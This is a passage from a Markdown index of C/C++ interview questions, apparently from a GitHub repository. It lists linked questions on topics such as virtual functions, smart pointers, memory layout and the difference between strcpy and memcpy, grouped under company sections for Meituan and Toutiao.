迭代器++it,it++哪个好,为什么](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#172%E8%BF%AD%E4%BB%A3%E5%99%A8itit%E5%93%AA%E4%B8%AA%E5%A5%BD%E4%B8%BA%E4%BB%80%E4%B9%88) ##### [4.6.1 模板和实现可不可以不写在一个文件里面?为什么?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#173%E6%A8%A1%E6%9D%BF%E5%92%8C%E5%AE%9E%E7%8E%B0%E5%8F%AF%E4%B8%8D%E5%8F%AF%E4%BB%A5%E4%B8%8D%E5%86%99%E5%9C%A8%E4%B8%80%E4%B8%AA%E6%96%87%E4%BB%B6%E9%87%8C%E9%9D%A2%E4%B8%BA%E4%BB%80%E4%B9%88) ##### [4.6.2 在成员函数中调用delete this会出现什么问题?对象还可以使用吗?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#174%E5%9C%A8%E6%88%90%E5%91%98%E5%87%BD%E6%95%B0%E4%B8%AD%E8%B0%83%E7%94%A8delete-this%E4%BC%9A%E5%87%BA%E7%8E%B0%E4%BB%80%E4%B9%88%E9%97%AE%E9%A2%98%E5%AF%B9%E8%B1%A1%E8%BF%98%E5%8F%AF%E4%BB%A5%E4%BD%BF%E7%94%A8%E5%90%97) ##### [4.6.3 智能指针的作用](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#175%E6%99%BA%E8%83%BD%E6%8C%87%E9%92%88%E7%9A%84%E4%BD%9C%E7%94%A8) ##### [4.6.4 auto_ptr作用](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#176auto_ptr%E4%BD%9C%E7%94%A8) ##### [4.6.5 class、union、struct的区别](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#177classunionstruct%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [4.6.6 动态联编与静态联编](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#178%E5%8A%A8%E6%80%81%E8%81%94%E7%BC%96%E4%B8%8E%E9%9D%99%E6%80%81%E8%81%94%E7%BC%96) ##### [4.6.7 动态编译与静态编译](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#179%E5%8A%A8%E6%80%81%E7%BC%96%E8%AF%91%E4%B8%8E%E9%9D%99%E6%80%81%E7%BC%96%E8%AF%91) ##### [4.6.8 动态链接和静态链接区别](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#180%E5%8A%A8%E6%80%81%E9%93%BE%E6%8E%A5%E5%92%8C%E9%9D%99%E6%80%81%E9%93%BE%E6%8E%A5%E5%8C%BA%E5%88%AB) ##### [4.6.9 在不使用额外空间的情况下,交换两个数?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#181%E5%9C%A8%E4%B8%8D%E4%BD%BF%E7%94%A8%E9%A2%9D%E5%A4%96%E7%A9%BA%E9%97%B4%E7%9A%84%E6%83%85%E5%86%B5%E4%B8%8B%E4%BA%A4%E6%8D%A2%E4%B8%A4%E4%B8%AA%E6%95%B0) ##### [4.7.0 strcpy和memcpy的区别](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#182strcpy%E5%92%8Cmemcpy%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [4.7.1 执行int main(int argc, char *argv[])时的内存结构](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#183%E6%89%A7%E8%A1%8Cint-mainint-argc-char-argv%E6%97%B6%E7%9A%84%E5%86%85%E5%AD%98%E7%BB%93%E6%9E%84) ##### [4.7.2 
volatile关键字的作用?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#184volatile%E5%85%B3%E9%94%AE%E5%AD%97%E7%9A%84%E4%BD%9C%E7%94%A8) ##### [4.7.3 讲讲大端小端,如何检测(三种方法)](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#185%E8%AE%B2%E8%AE%B2%E5%A4%A7%E7%AB%AF%E5%B0%8F%E7%AB%AF%E5%A6%82%E4%BD%95%E6%A3%80%E6%B5%8B%E4%B8%89%E7%A7%8D%E6%96%B9%E6%B3%95) ##### [4.7.4 查看内存的方法](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#186%E6%9F%A5%E7%9C%8B%E5%86%85%E5%AD%98%E7%9A%84%E6%96%B9%E6%B3%95) ##### [4.7.5 空类会默认添加哪些东西?怎么写?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#187%E7%A9%BA%E7%B1%BB%E4%BC%9A%E9%BB%98%E8%AE%A4%E6%B7%BB%E5%8A%A0%E5%93%AA%E4%BA%9B%E4%B8%9C%E8%A5%BF%E6%80%8E%E4%B9%88%E5%86%99) ##### [4.7.6 标准库是什么?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#188%E6%A0%87%E5%87%86%E5%BA%93%E6%98%AF%E4%BB%80%E4%B9%88) ##### [4.7.7 new、delete、operator new、operator delete、placement new、placement delete](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#189newdeleteoperator-newoperator-deleteplacement-newplacement-delete) ##### [4.7.8 为什么拷贝构造函数必须传引用不能传值?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#190%E4%B8%BA%E4%BB%80%E4%B9%88%E6%8B%B7%E8%B4%9D%E6%9E%84%E9%80%A0%E5%87%BD%E6%95%B0%E5%BF%85%E9%A1%BB%E4%BC%A0%E5%BC%95%E7%94%A8%E4%B8%8D%E8%83%BD%E4%BC%A0%E5%80%BC) ##### [4.7.9 空类的大小是多少?为什么?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#191%E7%A9%BA%E7%B1%BB%E7%9A%84%E5%A4%A7%E5%B0%8F%E6%98%AF%E5%A4%9A%E5%B0%91%E4%B8%BA%E4%BB%80%E4%B9%88) ##### [4.8.0 你什么情况用指针当参数,什么时候用引用,为什么?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#192%E4%BD%A0%E4%BB%80%E4%B9%88%E6%83%85%E5%86%B5%E7%94%A8%E6%8C%87%E9%92%88%E5%BD%93%E5%8F%82%E6%95%B0%E4%BB%80%E4%B9%88%E6%97%B6%E5%80%99%E7%94%A8%E5%BC%95%E7%94%A8%E4%B8%BA%E4%BB%80%E4%B9%88) ##### [4.8.1 大内存申请时候选用哪种?C++变量存在哪?变量的大小存在哪?符号表存在哪?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#193%E5%A4%A7%E5%86%85%E5%AD%98%E7%94%B3%E8%AF%B7%E6%97%B6%E5%80%99%E9%80%89%E7%94%A8%E5%93%AA%E7%A7%8Dc%E5%8F%98%E9%87%8F%E5%AD%98%E5%9C%A8%E5%93%AA%E5%8F%98%E9%87%8F%E7%9A%84%E5%A4%A7%E5%B0%8F%E5%AD%98%E5%9C%A8%E5%93%AA%E7%AC%A6%E5%8F%B7%E8%A1%A8%E5%AD%98%E5%9C%A8%E5%93%AA) <br> <h3 id="5">美团篇</h3> --- ##### [5.1.0 为什么会有大端小端,htol这一类函数的作用](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#194%E4%B8%BA%E4%BB%80%E4%B9%88%E4%BC%9A%E6%9C%89%E5%A4%A7%E7%AB%AF%E5%B0%8F%E7%AB%AFhtol%E8%BF%99%E4%B8%80%E7%B1%BB%E5%87%BD%E6%95%B0%E7%9A%84%E4%BD%9C%E7%94%A8) ##### [5.1.1 静态函数能定义为虚函数吗?常函数?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#195%E9%9D%99%E6%80%81%E5%87%BD%E6%95%B0%E8%83%BD%E5%AE%9A%E4%B9%89%E4%B8%BA%E8%99%9A%E5%87%BD%E6%95%B0%E5%90%97%E5%B8%B8%E5%87%BD%E6%95%B0) ##### [5.1.2 this指针调用成员变量时,堆栈会发生什么变化?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#196this%E6%8C%87%E9%92%88%E8%B0%83%E7%94%A8%E6%88%90%E5%91%98%E5%8F%98%E9%87%8F%E6%97%B6%E5%A0%86%E6%A0%88%E4%BC%9A%E5%8F%91%E7%94%9F%E4%BB%80%E4%B9%88%E5%8F%98%E5%8C%96) ##### [5.1.3 静态绑定和动态绑定的介绍](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#197%E9%9D%99%E6%80%81%E7%BB%91%E5%AE%9A%E5%92%8C%E5%8A%A8%E6%80%81%E7%BB%91%E5%AE%9A%E7%9A%84%E4%BB%8B%E7%BB%8D) ##### [5.1.4 
设计一个类计算子类的个数](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#198%E8%AE%BE%E8%AE%A1%E4%B8%80%E4%B8%AA%E7%B1%BB%E8%AE%A1%E7%AE%97%E5%AD%90%E7%B1%BB%E7%9A%84%E4%B8%AA%E6%95%B0) ##### [5.1.5 怎么快速定位错误出现的地方](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#199%E6%80%8E%E4%B9%88%E5%BF%AB%E9%80%9F%E5%AE%9A%E4%BD%8D%E9%94%99%E8%AF%AF%E5%87%BA%E7%8E%B0%E7%9A%84%E5%9C%B0%E6%96%B9) ##### [5.1.6 虚函数的代价?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#200%E8%99%9A%E5%87%BD%E6%95%B0%E7%9A%84%E4%BB%A3%E4%BB%B7) ##### [5.1.7 类对象的大小](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#201%E7%B1%BB%E5%AF%B9%E8%B1%A1%E7%9A%84%E5%A4%A7%E5%B0%8F) ##### [5.1.8 移动构造函数](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#202%E7%A7%BB%E5%8A%A8%E6%9E%84%E9%80%A0%E5%87%BD%E6%95%B0) ##### [5.1.9 何时需要合成构造函数](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#203%E4%BD%95%E6%97%B6%E9%9C%80%E8%A6%81%E5%90%88%E6%88%90%E6%9E%84%E9%80%A0%E5%87%BD%E6%95%B0) ##### [5.2.0 何时需要合成复制构造函数](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#204%E4%BD%95%E6%97%B6%E9%9C%80%E8%A6%81%E5%90%88%E6%88%90%E5%A4%8D%E5%88%B6%E6%9E%84%E9%80%A0%E5%87%BD%E6%95%B0) ##### [5.2.1 何时需要成员初始化列表?过程是什么?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#205%E4%BD%95%E6%97%B6%E9%9C%80%E8%A6%81%E6%88%90%E5%91%98%E5%88%9D%E5%A7%8B%E5%8C%96%E5%88%97%E8%A1%A8%E8%BF%87%E7%A8%8B%E6%98%AF%E4%BB%80%E4%B9%88) ##### [5.2.2 程序员定义的析构函数被扩展的过程?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#206%E7%A8%8B%E5%BA%8F%E5%91%98%E5%AE%9A%E4%B9%89%E7%9A%84%E6%9E%90%E6%9E%84%E5%87%BD%E6%95%B0%E8%A2%AB%E6%89%A9%E5%B1%95%E7%9A%84%E8%BF%87%E7%A8%8B) ##### [5.2.3 构造函数的执行算法?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#207%E6%9E%84%E9%80%A0%E5%87%BD%E6%95%B0%E7%9A%84%E6%89%A7%E8%A1%8C%E7%AE%97%E6%B3%95) ##### [5.2.4 构造函数的扩展过程?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#208%E6%9E%84%E9%80%A0%E5%87%BD%E6%95%B0%E7%9A%84%E6%89%A9%E5%B1%95%E8%BF%87%E7%A8%8B) ##### [5.2.5 哪些函数不能是虚函数](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#209%E5%93%AA%E4%BA%9B%E5%87%BD%E6%95%B0%E4%B8%8D%E8%83%BD%E6%98%AF%E8%99%9A%E5%87%BD%E6%95%B0) ##### [5.2.6 sizeof 和strlen 的区别](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#210sizeof-%E5%92%8Cstrlen-%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [5.2.7 简述strcpy、sprintf与memcpy的区别](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#211%E7%AE%80%E8%BF%B0strcpysprintf%E4%B8%8Ememcpy%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [5.2.8 编码实现某一变量某位清0或置1](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#212%E7%BC%96%E7%A0%81%E5%AE%9E%E7%8E%B0%E6%9F%90%E4%B8%80%E5%8F%98%E9%87%8F%E6%9F%90%E4%BD%8D%E6%B8%850%E6%88%96%E7%BD%AE1) ##### [5.2.9 将“引用”作为函数参数有哪些特点?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#213%E5%B0%86%E5%BC%95%E7%94%A8%E4%BD%9C%E4%B8%BA%E5%87%BD%E6%95%B0%E5%8F%82%E6%95%B0%E6%9C%89%E5%93%AA%E4%BA%9B%E7%89%B9%E7%82%B9) ##### [5.3.0 分别写出BOOL,int,float,指针类型的变量a 
与“零”的比较语句。](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#214%E5%88%86%E5%88%AB%E5%86%99%E5%87%BAboolintfloat%E6%8C%87%E9%92%88%E7%B1%BB%E5%9E%8B%E7%9A%84%E5%8F%98%E9%87%8Fa-%E4%B8%8E%E9%9B%B6%E7%9A%84%E6%AF%94%E8%BE%83%E8%AF%AD%E5%8F%A5) ##### [5.3.1 局部变量全局变量的问题?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#215%E5%B1%80%E9%83%A8%E5%8F%98%E9%87%8F%E5%85%A8%E5%B1%80%E5%8F%98%E9%87%8F%E7%9A%84%E9%97%AE%E9%A2%98) ##### [5.3.2 数组和指针的区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#216%E6%95%B0%E7%BB%84%E5%92%8C%E6%8C%87%E9%92%88%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [5.3.3 C++如何阻止一个类被实例化?一般在什么时候将构造函数声明为private?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#217c%E5%A6%82%E4%BD%95%E9%98%BB%E6%AD%A2%E4%B8%80%E4%B8%AA%E7%B1%BB%E8%A2%AB%E5%AE%9E%E4%BE%8B%E5%8C%96%E4%B8%80%E8%88%AC%E5%9C%A8%E4%BB%80%E4%B9%88%E6%97%B6%E5%80%99%E5%B0%86%E6%9E%84%E9%80%A0%E5%87%BD%E6%95%B0%E5%A3%B0%E6%98%8E%E4%B8%BAprivate) ##### [5.3.4 如何禁止自动生成拷贝构造函数?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#218%E5%A6%82%E4%BD%95%E7%A6%81%E6%AD%A2%E8%87%AA%E5%8A%A8%E7%94%9F%E6%88%90%E6%8B%B7%E8%B4%9D%E6%9E%84%E9%80%A0%E5%87%BD%E6%95%B0) ##### [5.3.5 assert与NDEBUG](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#219assert%E4%B8%8Endebuge) ##### [5.3.6 Debug和release的区别](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#220denug%E5%92%8Crelease%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [5.3.7 main函数有没有返回值](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#221main%E5%87%BD%E6%95%B0%E6%9C%89%E6%B2%A1%E6%9C%89%E8%BF%94%E5%9B%9E%E5%80%BC) ##### [5.3.8 写一个比较大小的模板函数](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#222%E5%86%99%E4%B8%80%E4%B8%AA%E6%AF%94%E8%BE%83%E5%A4%A7%E5%B0%8F%E7%9A%84%E6%A8%A1%E6%9D%BF%E5%87%BD%E6%95%B0) ##### [5.3.9 c++怎么实现一个函数先于main函数运行](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#223c%E6%80%8E%E4%B9%88%E5%AE%9E%E7%8E%B0%E4%B8%80%E4%B8%AA%E5%87%BD%E6%95%B0%E5%85%88%E4%BA%8Emain%E5%87%BD%E6%95%B0%E8%BF%90%E8%A1%8C) ##### [5.4.0 虚函数与纯虚函数的区别在于](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#224%E8%99%9A%E5%87%BD%E6%95%B0%E4%B8%8E%E7%BA%AF%E8%99%9A%E5%87%BD%E6%95%B0%E7%9A%84%E5%8C%BA%E5%88%AB%E5%9C%A8%E4%BA%8E) ##### [5.4.1 智能指针怎么用?智能指针出现循环引用怎么解决?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#225%E6%99%BA%E8%83%BD%E6%8C%87%E9%92%88%E6%80%8E%E4%B9%88%E7%94%A8%E6%99%BA%E8%83%BD%E6%8C%87%E9%92%88%E5%87%BA%E7%8E%B0%E5%BE%AA%E7%8E%AF%E5%BC%95%E7%94%A8%E6%80%8E%E4%B9%88%E8%A7%A3%E5%86%B3) ##### [5.4.2 strcpy函数和strncpy函数的区别?哪个函数更安全?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#226strcpy%E5%87%BD%E6%95%B0%E5%92%8Cstrncpy%E5%87%BD%E6%95%B0%E7%9A%84%E5%8C%BA%E5%88%AB%E5%93%AA%E4%B8%AA%E5%87%BD%E6%95%B0%E6%9B%B4%E5%AE%89%E5%85%A8) ##### [5.4.3 为什么要用static_cast转换而不用c语言中的转换?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#227%E4%B8%BA%E4%BB%80%E4%B9%88%E8%A6%81%E7%94%A8static_cast%E8%BD%AC%E6%8D%A2%E8%80%8C%E4%B8%8D%E7%94%A8c%E8%AF%AD%E8%A8%80%E4%B8%AD%E7%9A%84%E8%BD%AC%E6%8D%A2) ##### [5.4.4 
成员函数里memset(this,0,sizeof(*this))会发生什么](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#228%E6%88%90%E5%91%98%E5%87%BD%E6%95%B0%E9%87%8Cmemsetthis0sizeofthis%E4%BC%9A%E5%8F%91%E7%94%9F%E4%BB%80%E4%B9%88) ##### [5.4.5 方法调用的原理(栈,汇编)](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#229%E6%96%B9%E6%B3%95%E8%B0%83%E7%94%A8%E7%9A%84%E5%8E%9F%E7%90%86%E6%A0%88%E6%B1%87%E7%BC%96) ##### [5.4.6 回调函数的作用](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#231%E5%9B%9E%E8%B0%83%E5%87%BD%E6%95%B0%E7%9A%84%E4%BD%9C%E7%94%A8) ##### [5.4.7 随机数的生成](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#232%E9%9A%8F%E6%9C%BA%E6%95%B0%E7%9A%84%E7%94%9F%E6%88%90) ##### [5.4.8 变量的声明和定义有什么区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#233%E5%8F%98%E9%87%8F%E7%9A%84%E5%A3%B0%E6%98%8E%E5%92%8C%E5%AE%9A%E4%B9%89%E6%9C%89%E4%BB%80%E4%B9%88%E5%8C%BA%E5%88%AB) ##### [5.4.9 请简述#ifdef、#else、#endif、和#ifndef的作用是?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#234%E8%AF%B7%E7%AE%80%E8%BF%B0ifdefelseendif%E5%92%8Cifndef%E7%9A%84%E4%BD%9C%E7%94%A8%E6%98%AF) <br> <h3 id="6">头条篇</h3> --- ##### [6.1.0 请写出int、bool、float、指针变量与"零值"比较的if语句?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#235%E8%AF%B7%E5%86%99%E5%87%BAintboolfloat%E6%8C%87%E9%92%88%E5%8F%98%E9%87%8F%E4%B8%8E%E9%9B%B6%E5%80%BC%E6%AF%94%E8%BE%83%E7%9A%84if%E8%AF%AD%E5%8F%A5) ##### [6.1.1 结构体是否可以直接赋值?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#236%E7%BB%93%E6%9E%84%E4%BD%93%E6%98%AF%E5%90%A6%E5%8F%AF%E4%BB%A5%E7%9B%B4%E6%8E%A5%E8%B5%8B%E5%80%BC) ##### [6.1.2 sizeof和strlen的区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#237sizeof%E5%92%8Cstrlen%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [6.1.3 C语言和C++语言中的关键字static有什么区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#238c%E8%AF%AD%E8%A8%80%E5%92%8Cc%E8%AF%AD%E8%A8%80%E4%B8%AD%E7%9A%84%E5%85%B3%E9%94%AE%E5%AD%97static%E6%9C%89%E4%BB%80%E4%B9%88%E5%8C%BA%E5%88%AB) ##### [6.1.4 C语言的malloc和C++中的new有什么区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#239c%E8%AF%AD%E8%A8%80%E7%9A%84malloc%E5%92%8Cc%E4%B8%AD%E7%9A%84new%E6%9C%89%E4%BB%80%E4%B9%88%E5%8C%BA%E5%88%AB) ##### [6.1.5 请写一个标准宏MIN?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#240%E8%AF%B7%E5%86%99%E4%B8%80%E4%B8%AA%E6%A0%87%E5%87%86%E5%AE%8Fmin) ##### [6.1.6 ++i和i++的区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#241i%E5%92%8Ci%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [6.1.7 关键字volatile有什么作用?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#242%E5%85%B3%E9%94%AE%E5%AD%97volatile%E6%9C%89%E4%BB%80%E4%B9%88%E4%BD%9C%E7%94%A8) ##### [6.1.8 一个参数可以既是const又是volatile吗?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#243%E4%B8%80%E4%B8%AA%E5%8F%82%E6%95%B0%E5%8F%AF%E4%BB%A5%E6%97%A2%E6%98%AFconst%E5%8F%88%E6%98%AFvolatile%E5%90%97) ##### [6.1.9 *a和&a有什么区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#244a%E5%92%8Ca%E6%9C%89%E4%BB%80%E4%B9%88%E5%8C%BA%E5%88%AB) ##### [6.2.0 
用C语言编写一个死循环程序?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#245%E7%94%A8c%E8%AF%AD%E8%A8%80%E7%BC%96%E5%86%99%E4%B8%80%E4%B8%AA%E6%AD%BB%E5%BE%AA%E7%8E%AF%E7%A8%8B%E5%BA%8F) ##### [6.2.1 全局变量和局部变量有什么区别?是怎么实现的?操作系统和编译器是怎么知道的?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#247%E5%85%A8%E5%B1%80%E5%8F%98%E9%87%8F%E5%92%8C%E5%B1%80%E9%83%A8%E5%8F%98%E9%87%8F%E6%9C%89%E4%BB%80%E4%B9%88%E5%8C%BA%E5%88%AB%E6%98%AF%E6%80%8E%E4%B9%88%E5%AE%9E%E7%8E%B0%E7%9A%84%E6%93%8D%E4%BD%9C%E7%B3%BB%E7%BB%9F%E5%92%8C%E7%BC%96%E8%AF%91%E5%99%A8%E6%98%AF%E6%80%8E%E4%B9%88%E7%9F%A5%E9%81%93%E7%9A%84) ##### [6.2.2 请简述C/C++程序编译的内存分配情况?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#248%E8%AF%B7%E7%AE%80%E8%BF%B0cc%E7%A8%8B%E5%BA%8F%E7%BC%96%E8%AF%91%E7%9A%84%E5%86%85%E5%AD%98%E5%88%86%E9%85%8D%E6%83%85%E5%86%B5) ##### [6.2.3 请简述strcpy、sprintf和memcpy的区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#249%E8%AF%B7%E7%AE%80%E8%BF%B0strcpysprintf%E5%92%8Cmemcpy%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [6.2.4 请解释((void ()())0)()的含义?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#250%E8%AF%B7%E8%A7%A3%E9%87%8Avoid-0%E7%9A%84%E5%90%AB%E4%B9%89) ##### [6.2.5 C语言的指针和引用和C++的有什么区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#251c%E8%AF%AD%E8%A8%80%E7%9A%84%E6%8C%87%E9%92%88%E5%92%8C%E5%BC%95%E7%94%A8%E5%92%8Cc%E7%9A%84%E6%9C%89%E4%BB%80%E4%B9%88%E5%8C%BA%E5%88%AB) ##### [6.2.6 typedef和define有什么区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#252typedef%E5%92%8Cdefine%E6%9C%89%E4%BB%80%E4%B9%88%E5%8C%BA%E5%88%AB) ##### [6.2.7 指针常量和常量指针有什么区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#253%E6%8C%87%E9%92%88%E5%B8%B8%E9%87%8F%E5%92%8C%E5%B8%B8%E9%87%8F%E6%8C%87%E9%92%88%E6%9C%89%E4%BB%80%E4%B9%88%E5%8C%BA%E5%88%AB) ##### [6.2.8 请简述队列和栈的异同?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#254%E8%AF%B7%E7%AE%80%E8%BF%B0%E9%98%9F%E5%88%97%E5%92%8C%E6%A0%88%E7%9A%84%E5%BC%82%E5%90%8C) ##### [6.2.9 如何设置地址为0x67a9的整型变量的值为0xaa66?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#255%E5%A6%82%E4%BD%95%E8%AE%BE%E7%BD%AE%E5%9C%B0%E5%9D%80%E4%B8%BA0x67a9%E7%9A%84%E6%95%B4%E5%9E%8B%E5%8F%98%E9%87%8F%E7%9A%84%E5%80%BC%E4%B8%BA0xaa66) ##### [6.3.0 请编程实现字符串转换为数字?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#256%E8%AF%B7%E7%BC%96%E7%A8%8B%E5%AE%9E%E7%8E%B0%E5%AD%97%E7%AC%A6%E4%B8%B2%E8%BD%AC%E6%8D%A2%E4%B8%BA%E6%95%B0%E5%AD%97) ##### [6.3.1 C语言的结构体和C++的有什么区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#257c%E8%AF%AD%E8%A8%80%E7%9A%84%E7%BB%93%E6%9E%84%E4%BD%93%E5%92%8Cc%E7%9A%84%E6%9C%89%E4%BB%80%E4%B9%88%E5%8C%BA%E5%88%AB) ##### [6.3.2 简述指针常量与常量指针的区别?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#258%E7%AE%80%E8%BF%B0%E6%8C%87%E9%92%88%E5%B8%B8%E9%87%8F%E4%B8%8E%E5%B8%B8%E9%87%8F%E6%8C%87%E9%92%88%E7%9A%84%E5%8C%BA%E5%88%AB) ##### [6.3.3 如何避免"野指针"?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#259%E5%A6%82%E4%BD%95%E9%81%BF%E5%85%8D%E9%87%8E%E6%8C%87%E9%92%88) ##### [6.3.4 
句柄和指针的区别和联系是什么?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#260%E5%8F%A5%E6%9F%84%E5%92%8C%E6%8C%87%E9%92%88%E7%9A%84%E5%8C%BA%E5%88%AB%E5%92%8C%E8%81%94%E7%B3%BB%E6%98%AF%E4%BB%80%E4%B9%88) ##### [6.3.5 new/delete与malloc/free的区别是什么?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#261newdelete%E4%B8%8Emallocfree%E7%9A%84%E5%8C%BA%E5%88%AB%E6%98%AF%E4%BB%80%E4%B9%88) ##### [6.3.6 请说一说extern "C"?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#262%E8%AF%B7%E8%AF%B4%E4%B8%80%E8%AF%B4extern-c) ##### [6.3.7 请说一说C++中struct和class的区别是什么?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#263%E8%AF%B7%E8%AF%B4%E4%B8%80%E8%AF%B4c%E4%B8%ADstruct%E5%92%8Cclass%E7%9A%84%E5%8C%BA%E5%88%AB%E6%98%AF%E4%BB%80%E4%B9%88) ##### [6.3.8 new、delete、malloc、free关系](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#264newdeletemallocfree%E5%85%B3%E7%B3%BB) ##### [6.3.9 delete与 delete []区别](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#265delete%E4%B8%8E-delete-%E5%8C%BA%E5%88%AB) ##### [6.4.0 C++有哪些性质(面向对象特点)](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#266c%E6%9C%89%E5%93%AA%E4%BA%9B%E6%80%A7%E8%B4%A8%E9%9D%A2%E5%90%91%E5%AF%B9%E8%B1%A1%E7%89%B9%E7%82%B9) ##### [6.4.1 子类析构时要调用父类的析构函数吗?](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#267%E5%AD%90%E7%B1%BB%E6%9E%90%E6%9E%84%E6%97%B6%E8%A6%81%E8%B0%83%E7%94%A8%E7%88%B6%E7%B1%BB%E7%9A%84%E6%9E%90%E6%9E%84%E5%87%BD%E6%95%B0%E5%90%97) ##### [6.4.2 多态,虚函数,纯虚函数](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#268%E5%A4%9A%E6%80%81%E8%99%9A%E5%87%BD%E6%95%B0%E7%BA%AF%E8%99%9A%E5%87%BD%E6%95%B0) ##### [6.4.3 求下面函数的返回值(微软)](https://github.com/0voice/interview_internal_reference/blob/master/2023adding.md#269%E6%B1%82%E4%B8%8B%E9%9D%A2%E5%87%BD%E6%95%B0%E7%9A%84%E8%BF%94%E5%9B%9E%E5%80%BC%E5%BE%AE%E8%BD%AF) ##### [6.4.4 